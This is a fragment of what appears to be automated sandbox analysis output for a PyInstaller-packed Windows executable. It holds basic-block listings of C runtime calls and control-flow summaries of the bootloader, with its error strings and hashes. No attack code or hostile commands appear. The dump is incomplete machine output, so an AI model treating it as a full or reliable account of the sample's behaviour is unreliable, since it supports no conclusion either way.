19555 7ff79a324fbc 45 API calls 19553->19555 19556 7ff79a336341 19553->19556 19554->19556 19555->19556 19556->19224 19558 7ff79a324fbc 45 API calls 19557->19558 19559 7ff79a338fe1 19558->19559 19562 7ff79a338c38 19559->19562 19564 7ff79a338c86 19562->19564 19563 7ff79a31c5c0 _log10_special 8 API calls 19565 7ff79a337275 19563->19565 19566 7ff79a338d0d 19564->19566 19568 7ff79a338cf8 GetCPInfo 19564->19568 19571 7ff79a338d11 19564->19571 19565->19224 19565->19251 19567 7ff79a32f910 _fread_nolock MultiByteToWideChar 19566->19567 19566->19571 19569 7ff79a338da5 19567->19569 19568->19566 19568->19571 19570 7ff79a32d66c _fread_nolock 12 API calls 19569->19570 19569->19571 19572 7ff79a338ddc 19569->19572 19570->19572 19571->19563 19572->19571 19573 7ff79a32f910 _fread_nolock MultiByteToWideChar 19572->19573 19574 7ff79a338e4a 19573->19574 19575 7ff79a32f910 _fread_nolock MultiByteToWideChar 19574->19575 19584 7ff79a338f2c 19574->19584 19577 7ff79a338e70 19575->19577 19576 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19576->19571 19578 7ff79a32d66c _fread_nolock 12 API calls 19577->19578 19579 7ff79a338e9d 19577->19579 19577->19584 19578->19579 19580 7ff79a32f910 _fread_nolock MultiByteToWideChar 19579->19580 19579->19584 19581 7ff79a338f14 19580->19581 19582 7ff79a338f1a 19581->19582 19583 7ff79a338f34 19581->19583 19582->19584 19586 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19582->19586 19591 7ff79a32efd8 19583->19591 19584->19571 19584->19576 19586->19584 19588 7ff79a338f73 19588->19571 19590 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19588->19590 19589 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19589->19588 19590->19571 19592 7ff79a32ed80 __crtLCMapStringW 5 API calls 19591->19592 19593 7ff79a32f016 19592->19593 19594 7ff79a32f01e 19593->19594 19595 7ff79a32f240 __crtLCMapStringW 5 API calls 19593->19595 19594->19588 19594->19589 19596 7ff79a32f087 CompareStringW 19595->19596 19596->19594 19598 7ff79a337cca HeapSize 19597->19598 19599 7ff79a337cb1 19597->19599 19600 7ff79a324f78 memcpy_s 11 API calls 19599->19600 19601 7ff79a337cb6 19600->19601 19602 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19601->19602 19603 7ff79a337cc1 19602->19603 19603->19255 19605 7ff79a337cf9 19604->19605 19606 7ff79a337d03 19604->19606 19607 7ff79a32d66c _fread_nolock 12 API calls 19605->19607 19608 7ff79a337d08 19606->19608 19614 7ff79a337d0f memcpy_s 19606->19614 19613 7ff79a337d01 19607->19613 19611 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19608->19611 19609 7ff79a337d42 HeapReAlloc 19609->19613 19609->19614 19610 7ff79a337d15 19612 7ff79a324f78 memcpy_s 11 API calls 19610->19612 19611->19613 19612->19613 19613->19260 19614->19609 19614->19610 19615 7ff79a333600 memcpy_s 2 API calls 19614->19615 19615->19614 19617 7ff79a32ed80 __crtLCMapStringW 5 API calls 19616->19617 19618 7ff79a32efb4 19617->19618 19618->19264 19620 7ff79a32556a 19619->19620 19621 7ff79a325546 19619->19621 19622 7ff79a32556f 19620->19622 19623 7ff79a3255c4 19620->19623 19625 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19621->19625 19628 7ff79a325555 19621->19628 19626 7ff79a325584 19622->19626 19622->19628 19629 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19622->19629 19624 7ff79a32f910 _fread_nolock MultiByteToWideChar 19623->19624 19636 7ff79a3255e0 19624->19636 19625->19628 19630 7ff79a32d66c _fread_nolock 12 API calls 19626->19630 19627 7ff79a3255e7 GetLastError 19631 7ff79a324eec _fread_nolock 11 API calls 19627->19631 19628->19268 19628->19269 19629->19626 19630->19628 19634 7ff79a3255f4 19631->19634 19632 7ff79a325622 19632->19628 19633 7ff79a32f910 _fread_nolock MultiByteToWideChar 19632->19633 19638 7ff79a325666 19633->19638 19639 7ff79a324f78 memcpy_s 11 API calls 19634->19639 19635 7ff79a325615 19637 7ff79a32d66c _fread_nolock 12 API calls 19635->19637 19636->19627 19636->19632 19636->19635 19640 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19636->19640 19637->19632 19638->19627 19638->19628 19639->19628 19640->19635 19642 7ff79a329295 19641->19642 19653 7ff79a329291 19641->19653 19662 7ff79a332aac GetEnvironmentStringsW 19642->19662 19645 7ff79a3292ae 19669 7ff79a3293fc 19645->19669 19646 7ff79a3292a2 19647 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19646->19647 19647->19653 19650 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19651 7ff79a3292d5 19650->19651 19652 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19651->19652 19652->19653 19653->19300 19654 7ff79a32963c 19653->19654 19655 7ff79a329676 19654->19655 19656 7ff79a32965f 19654->19656 19655->19656 19657 7ff79a32ec08 memcpy_s 11 API calls 19655->19657 19658 7ff79a3296ea 19655->19658 19659 7ff79a32f910 MultiByteToWideChar _fread_nolock 19655->19659 19661 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19655->19661 19656->19300 19657->19655 19660 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19658->19660 19659->19655 19660->19656 19661->19655 19663 7ff79a32929a 19662->19663 19664 7ff79a332ad0 19662->19664 19663->19645 19663->19646 19665 7ff79a32d66c _fread_nolock 12 API calls 19664->19665 19666 7ff79a332b07 memcpy_s 19665->19666 19667 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19666->19667 19668 7ff79a332b27 FreeEnvironmentStringsW 19667->19668 19668->19663 19670 7ff79a329424 19669->19670 19671 7ff79a32ec08 memcpy_s 11 API calls 19670->19671 19683 7ff79a32945f 19671->19683 19672 7ff79a329467 19673 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19672->19673 19674 7ff79a3292b6 19673->19674 19674->19650 19675 7ff79a3294e1 19676 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19675->19676 19676->19674 19677 7ff79a32ec08 memcpy_s 11 API calls 19677->19683 19678 7ff79a3294d0 19679 7ff79a329518 11 API calls 19678->19679 19681 7ff79a3294d8 19679->19681 19680 7ff79a3304e4 37 API calls 19680->19683 19682 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19681->19682 19682->19672 19683->19672 19683->19675 19683->19677 19683->19678 19683->19680 19684 7ff79a329504 19683->19684 19686 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19683->19686 19685 7ff79a32a970 _isindst 17 API calls 19684->19685 19687 7ff79a329516 19685->19687 19686->19683 19690 7ff79a338ba1 __crtLCMapStringW 19688->19690 19689 7ff79a33715e 19689->19323 19689->19324 19690->19689 19691 7ff79a32efd8 6 API calls 19690->19691 19691->19689 19899 7ff79a31cbc0 19900 7ff79a31cbd0 19899->19900 19916 7ff79a329c18 19900->19916 19902 7ff79a31cbdc 19922 7ff79a31ceb8 19902->19922 19904 7ff79a31d19c 7 API calls 19906 7ff79a31cc75 19904->19906 19905 7ff79a31cbf4 _RTC_Initialize 19914 7ff79a31cc49 19905->19914 19927 7ff79a31d068 19905->19927 19908 7ff79a31cc09 19930 7ff79a329084 19908->19930 19914->19904 19915 7ff79a31cc65 19914->19915 19917 7ff79a329c29 19916->19917 19918 7ff79a329c31 19917->19918 19919 7ff79a324f78 memcpy_s 11 API calls 19917->19919 19918->19902 19920 7ff79a329c40 19919->19920 19921 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19920->19921 19921->19918 19923 7ff79a31cec9 19922->19923 19926 7ff79a31cece __scrt_acquire_startup_lock 19922->19926 19924 7ff79a31d19c 7 API calls 19923->19924 19923->19926 19925 7ff79a31cf42 19924->19925 19926->19905 19955 7ff79a31d02c 19927->19955 19929 7ff79a31d071 19929->19908 19931 7ff79a31cc15 19930->19931 19932 7ff79a3290a4 19930->19932 19931->19914 19954 7ff79a31d13c InitializeSListHead 19931->19954 19933 7ff79a3290ac 19932->19933 19934 7ff79a3290c2 GetModuleFileNameW 19932->19934 19935 7ff79a324f78 memcpy_s 11 API calls 19933->19935 19938 7ff79a3290ed 19934->19938 19936 7ff79a3290b1 19935->19936 19937 7ff79a32a950 _invalid_parameter_noinfo 37 API calls 19936->19937 19937->19931 19970 7ff79a329024 19938->19970 19941 7ff79a329135 19942 7ff79a324f78 memcpy_s 11 API calls 19941->19942 19943 7ff79a32913a 19942->19943 19944 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19943->19944 19944->19931 19945 7ff79a32916f 19947 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19945->19947 19946 7ff79a32914d 19946->19945 19948 7ff79a32919b 19946->19948 19949 7ff79a3291b4 19946->19949 19947->19931 19950 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19948->19950 19951 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19949->19951 19952 7ff79a3291a4 19950->19952 19951->19945 19953 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19952->19953 19953->19931 19956 7ff79a31d046 19955->19956 19958 7ff79a31d03f 19955->19958 19959 7ff79a32a25c 19956->19959 19958->19929 19962 7ff79a329e98 19959->19962 19969 7ff79a330348 EnterCriticalSection 19962->19969 19971 7ff79a32903c 19970->19971 19975 7ff79a329074 19970->19975 19972 7ff79a32ec08 memcpy_s 11 API calls 19971->19972 19971->19975 19973 7ff79a32906a 19972->19973 19974 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19973->19974 19974->19975 19975->19941 19975->19946 19976 7ff79a329dc0 19979 7ff79a329d3c 19976->19979 19986 7ff79a330348 EnterCriticalSection 19979->19986 20109 7ff79a32b040 20110 7ff79a32b05a 20109->20110 20111 7ff79a32b045 20109->20111 20115 7ff79a32b060 20111->20115 20116 7ff79a32b0aa 20115->20116 20117 7ff79a32b0a2 20115->20117 20119 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20116->20119 20118 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20117->20118 20118->20116 20120 7ff79a32b0b7 20119->20120 20121 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20120->20121 20122 7ff79a32b0c4 20121->20122 20123 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20122->20123 20124 7ff79a32b0d1 20123->20124 20125 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20124->20125 20126 7ff79a32b0de 20125->20126 20127 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20126->20127 20128 7ff79a32b0eb 20127->20128 20129 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20128->20129 20130 7ff79a32b0f8 20129->20130 20131 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20130->20131 20132 7ff79a32b105 20131->20132 20133 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20132->20133 20134 7ff79a32b115 20133->20134 20135 7ff79a32a9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20134->20135 20136 7ff79a32b125 20135->20136 20141 7ff79a32af04 20136->20141 20155 7ff79a330348 EnterCriticalSection 20141->20155 18839 7ff79a31bb50 18840 7ff79a31bb7e 18839->18840 18841 7ff79a31bb65 18839->18841 18841->18840 18843 7ff79a32d66c 12 API calls 18841->18843 18842 7ff79a31bbde 18843->18842 18844 7ff79a3299d1 18845 7ff79a32a448 45 API calls 18844->18845 18846 7ff79a3299d6 18845->18846 18847 7ff79a329a47 18846->18847 18848 7ff79a3299fd GetModuleHandleW 18846->18848 18856 7ff79a3298d4 18847->18856 18848->18847 18852 7ff79a329a0a 18848->18852 18852->18847 18870 7ff79a329af8 GetModuleHandleExW 18852->18870 18876 7ff79a330348 EnterCriticalSection 18856->18876 18871 7ff79a329b2c GetProcAddress 18870->18871 18872 7ff79a329b55 18870->18872 18873 7ff79a329b3e 18871->18873 18874 7ff79a329b5a FreeLibrary 18872->18874 18875 7ff79a329b61 18872->18875 18873->18872 18874->18875 18875->18847 20157 7ff79a33ac53 20159 7ff79a33ac63 20157->20159 20161 7ff79a3254e8 LeaveCriticalSection 20159->20161

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 7ff79a318bd0-7ff79a318d16 call 7ff79a31c8c0 call 7ff79a319400 SetConsoleCtrlHandler GetStartupInfoW call 7ff79a325460 call 7ff79a32a4ec call 7ff79a32878c call 7ff79a325460 call 7ff79a32a4ec call 7ff79a32878c call 7ff79a325460 call 7ff79a32a4ec call 7ff79a32878c GetCommandLineW CreateProcessW 23 7ff79a318d18-7ff79a318d38 GetLastError call 7ff79a312c50 0->23 24 7ff79a318d3d-7ff79a318d79 RegisterClassW 0->24 32 7ff79a319029-7ff79a31904f call 7ff79a31c5c0 23->32 25 7ff79a318d7b GetLastError 24->25 26 7ff79a318d81-7ff79a318dd5 CreateWindowExW 24->26 25->26 28 7ff79a318dd7-7ff79a318ddd GetLastError 26->28 29 7ff79a318ddf-7ff79a318de4 ShowWindow 26->29 31 7ff79a318dea-7ff79a318dfa WaitForSingleObject 28->31 29->31 34 7ff79a318e78-7ff79a318e7f 31->34 35 7ff79a318dfc 31->35 38 7ff79a318ec2-7ff79a318ec9 34->38 39 7ff79a318e81-7ff79a318e91 WaitForSingleObject 34->39 37 7ff79a318e00-7ff79a318e03 35->37 42 7ff79a318e0b-7ff79a318e12 37->42 43 7ff79a318e05 GetLastError 37->43 40 7ff79a318fb0-7ff79a318fc9 GetMessageW 38->40 41 7ff79a318ecf-7ff79a318ee5 QueryPerformanceFrequency QueryPerformanceCounter 38->41 44 7ff79a318fe8-7ff79a318ff2 39->44 45 7ff79a318e97-7ff79a318ea7 TerminateProcess 39->45 48 7ff79a318fcb-7ff79a318fd9 TranslateMessage DispatchMessageW 40->48 49 7ff79a318fdf-7ff79a318fe6 40->49 46 7ff79a318ef0-7ff79a318f28 MsgWaitForMultipleObjects PeekMessageW 41->46 42->39 47 7ff79a318e14-7ff79a318e31 PeekMessageW 42->47 43->42 50 7ff79a319001-7ff79a319025 GetExitCodeProcess CloseHandle * 2 44->50 51 7ff79a318ff4-7ff79a318ffa DestroyWindow 44->51 52 7ff79a318ea9 GetLastError 45->52 53 7ff79a318eaf-7ff79a318ebd WaitForSingleObject 45->53 54 7ff79a318f2a 46->54 55 7ff79a318f63-7ff79a318f6a 46->55 56 7ff79a318e33-7ff79a318e64 TranslateMessage DispatchMessageW PeekMessageW 47->56 57 7ff79a318e66-7ff79a318e76 WaitForSingleObject 47->57 48->49 49->40 49->44 50->32 51->50 52->53 53->44 58 7ff79a318f30-7ff79a318f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->40 59 7ff79a318f6c-7ff79a318f95 QueryPerformanceCounter 55->59 56->56 56->57 57->34 57->37 58->55 58->58 59->46 60 7ff79a318f9b-7ff79a318fa2 59->60 60->44 61 7ff79a318fa4-7ff79a318fa8 60->61 61->40
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                              • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                              • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                              • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction ID: 05c46e7c3f19d902a82c6ca35d0ffc88125f0170587f6fbf4177c0ea1be8c11b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11D16032E0AA8286F720EF74E8542A9B760FB84B58FC0427DEA5D42A94DF3CD545C754

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 62 7ff79a311000-7ff79a313806 call 7ff79a31fe88 call 7ff79a31fe90 call 7ff79a31c8c0 call 7ff79a325460 call 7ff79a3254f4 call 7ff79a3136b0 76 7ff79a313808-7ff79a31380f 62->76 77 7ff79a313814-7ff79a313836 call 7ff79a311950 62->77 78 7ff79a313c97-7ff79a313cb2 call 7ff79a31c5c0 76->78 82 7ff79a31391b-7ff79a313931 call 7ff79a3145b0 77->82 83 7ff79a31383c-7ff79a313856 call 7ff79a311c80 77->83 90 7ff79a31396a-7ff79a31397f call 7ff79a312710 82->90 91 7ff79a313933-7ff79a313960 call 7ff79a317f80 82->91 87 7ff79a31385b-7ff79a31389b call 7ff79a318a20 83->87 96 7ff79a31389d-7ff79a3138a3 87->96 97 7ff79a3138c1-7ff79a3138cc call 7ff79a324fa0 87->97 101 7ff79a313c8f 90->101 99 7ff79a313962-7ff79a313965 call 7ff79a3200bc 91->99 100 7ff79a313984-7ff79a3139a6 call 7ff79a311c80 91->100 102 7ff79a3138af-7ff79a3138bd call 7ff79a318b90 96->102 103 7ff79a3138a5-7ff79a3138ad 96->103 109 7ff79a3139fc-7ff79a313a2a call 7ff79a318b30 call 7ff79a318b90 * 3 97->109 110 7ff79a3138d2-7ff79a3138e1 call 7ff79a318a20 97->110 99->90 115 7ff79a3139b0-7ff79a3139b9 100->115 101->78 102->97 103->102 138 7ff79a313a2f-7ff79a313a3e call 7ff79a318a20 109->138 119 7ff79a3138e7-7ff79a3138ed 110->119 120 7ff79a3139f4-7ff79a3139f7 call 7ff79a324fa0 110->120 115->115 118 7ff79a3139bb-7ff79a3139d8 call 7ff79a311950 115->118 118->87 130 7ff79a3139de-7ff79a3139ef call 7ff79a312710 118->130 124 7ff79a3138f0-7ff79a3138fc 119->124 120->109 127 7ff79a3138fe-7ff79a313903 124->127 128 7ff79a313905-7ff79a313908 124->128 127->124 127->128 128->120 131 7ff79a31390e-7ff79a313916 call 7ff79a324fa0 128->131 130->101 131->138 141 7ff79a313a44-7ff79a313a47 138->141 142 7ff79a313b45-7ff79a313b53 138->142 141->142 145 7ff79a313a4d-7ff79a313a50 141->145 143 7ff79a313a67 142->143 144 7ff79a313b59-7ff79a313b5d 142->144 146 7ff79a313a6b-7ff79a313a90 call 7ff79a324fa0 143->146 144->146 147 7ff79a313b14-7ff79a313b17 145->147 148 7ff79a313a56-7ff79a313a5a 145->148 157 7ff79a313aab-7ff79a313ac0 146->157 158 7ff79a313a92-7ff79a313aa6 call 7ff79a318b30 146->158 149 7ff79a313b19-7ff79a313b1d 147->149 150 7ff79a313b2f-7ff79a313b40 call 7ff79a312710 147->150 148->147 152 7ff79a313a60 148->152 149->150 153 7ff79a313b1f-7ff79a313b2a 149->153 159 7ff79a313c7f-7ff79a313c87 150->159 152->143 153->146 161 7ff79a313be8-7ff79a313bfa call 7ff79a318a20 157->161 162 7ff79a313ac6-7ff79a313aca 157->162 158->157 159->101 170 7ff79a313bfc-7ff79a313c02 161->170 171 7ff79a313c2e 161->171 164 7ff79a313bcd-7ff79a313be2 call 7ff79a311940 162->164 165 7ff79a313ad0-7ff79a313ae8 call 7ff79a3252c0 162->165 164->161 164->162 175 7ff79a313aea-7ff79a313b02 call 7ff79a3252c0 165->175 176 7ff79a313b62-7ff79a313b7a call 7ff79a3252c0 165->176 173 7ff79a313c1e-7ff79a313c2c 170->173 174 7ff79a313c04-7ff79a313c1c 170->174 177 7ff79a313c31-7ff79a313c40 call 7ff79a324fa0 171->177 173->177 174->177 175->164 188 7ff79a313b08-7ff79a313b0f 175->188 186 7ff79a313b87-7ff79a313b9f call 7ff79a3252c0 176->186 187 7ff79a313b7c-7ff79a313b80 176->187 184 7ff79a313d41-7ff79a313d63 call 7ff79a3144d0 177->184 185 7ff79a313c46-7ff79a313c4a 177->185 199 7ff79a313d71-7ff79a313d82 call 7ff79a311c80 184->199 200 7ff79a313d65-7ff79a313d6f call 7ff79a314620 184->200 189 7ff79a313c50-7ff79a313c5f call 7ff79a3190e0 185->189 190 7ff79a313cd4-7ff79a313ce6 call 7ff79a318a20 185->190 201 7ff79a313bac-7ff79a313bc4 call 7ff79a3252c0 186->201 202 7ff79a313ba1-7ff79a313ba5 186->202 187->186 188->164 204 7ff79a313c61 189->204 205 7ff79a313cb3-7ff79a313cb6 call 7ff79a318850 189->205 206 7ff79a313ce8-7ff79a313ceb 190->206 207 7ff79a313d35-7ff79a313d3c 190->207 214 7ff79a313d87-7ff79a313d96 199->214 200->214 201->164 216 7ff79a313bc6 201->216 202->201 211 7ff79a313c68 call 7ff79a312710 204->211 221 7ff79a313cbb-7ff79a313cbd 205->221 206->207 212 7ff79a313ced-7ff79a313d10 call 7ff79a311c80 206->212 207->211 224 7ff79a313c6d-7ff79a313c77 211->224 229 7ff79a313d2b-7ff79a313d33 call 7ff79a324fa0 212->229 230 7ff79a313d12-7ff79a313d26 call 7ff79a312710 call 7ff79a324fa0 212->230 219 7ff79a313d98-7ff79a313d9f 214->219 220 7ff79a313dc4-7ff79a313dda call 7ff79a319400 214->220 216->164 219->220 226 7ff79a313da1-7ff79a313da5 219->226 232 7ff79a313de8-7ff79a313e04 SetDllDirectoryW 220->232 233 7ff79a313ddc 220->233 222 7ff79a313cc8-7ff79a313ccf 221->222 223 7ff79a313cbf-7ff79a313cc6 221->223 222->214 223->211 224->159 226->220 231 7ff79a313da7-7ff79a313dbe SetDllDirectoryW LoadLibraryExW 226->231 229->214 230->224 231->220 237 7ff79a313e0a-7ff79a313e19 call 7ff79a318a20 232->237 238 7ff79a313f01-7ff79a313f08 232->238 233->232 251 7ff79a313e1b-7ff79a313e21 237->251 252 7ff79a313e32-7ff79a313e3c call 7ff79a324fa0 237->252 242 7ff79a313ffc-7ff79a314004 238->242 243 7ff79a313f0e-7ff79a313f15 238->243 245 7ff79a314029-7ff79a31405b call 7ff79a3136a0 call 7ff79a313360 call 7ff79a313670 call 7ff79a316fb0 call 7ff79a316d60 242->245 246 7ff79a314006-7ff79a314023 PostMessageW GetMessageW 242->246 243->242 244 7ff79a313f1b-7ff79a313f25 call 7ff79a3133c0 243->244 244->224 258 7ff79a313f2b-7ff79a313f3f call 7ff79a3190c0 244->258 246->245 255 7ff79a313e2d-7ff79a313e2f 251->255 256 7ff79a313e23-7ff79a313e2b 251->256 263 7ff79a313ef2-7ff79a313efc call 7ff79a318b30 252->263 264 7ff79a313e42-7ff79a313e48 252->264 255->252 256->255 269 7ff79a313f41-7ff79a313f5e PostMessageW GetMessageW 258->269 270 7ff79a313f64-7ff79a313fa0 call 7ff79a318b30 call 7ff79a318bd0 call 7ff79a316fb0 call 7ff79a316d60 call 7ff79a318ad0 258->270 263->238 264->263 268 7ff79a313e4e-7ff79a313e54 264->268 272 7ff79a313e5f-7ff79a313e61 268->272 273 7ff79a313e56-7ff79a313e58 268->273 269->270 306 7ff79a313fa5-7ff79a313fa7 270->306 272->238 274 7ff79a313e67-7ff79a313e83 call 7ff79a316db0 call 7ff79a317330 272->274 273->274 275 7ff79a313e5a 273->275 289 7ff79a313e8e-7ff79a313e95 274->289 290 7ff79a313e85-7ff79a313e8c 274->290 275->238 293 7ff79a313e97-7ff79a313ea4 call 7ff79a316df0 289->293 294 7ff79a313eaf-7ff79a313eb9 call 7ff79a3171a0 289->294 292 7ff79a313edb-7ff79a313ef0 call 7ff79a312a50 call 7ff79a316fb0 call 7ff79a316d60 290->292 292->238 293->294 308 7ff79a313ea6-7ff79a313ead 293->308 304 7ff79a313ebb-7ff79a313ec2 294->304 305 7ff79a313ec4-7ff79a313ed2 call 7ff79a3174e0 294->305 304->292 305->238 317 7ff79a313ed4 305->317 310 7ff79a313fe9-7ff79a313ff7 call 7ff79a311900 306->310 311 7ff79a313fa9-7ff79a313fb3 call 7ff79a319200 306->311 308->292 310->224 311->310 321 7ff79a313fb5-7ff79a313fca 311->321 317->292 322 7ff79a313fcc-7ff79a313fdf call 7ff79a312710 call 7ff79a311900 321->322 323 7ff79a313fe4 call 7ff79a312a50 321->323 322->224 323->310
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                              • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                              • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                              • Opcode ID: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                              • Instruction ID: 0cf9c1b22694ffbcbc11b5977d8b8f83a031d1d6c560bfee3f93159889580c1e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44b6149e1a44f815cbaf6e2375de99b2dfa5e961a20aa3e5c6a8e77e9d9f5974
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35329A22E0E68291FAB5FB3194543B9F6A1AF44784FC540BEDA4D432D6EF2CE559C320

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
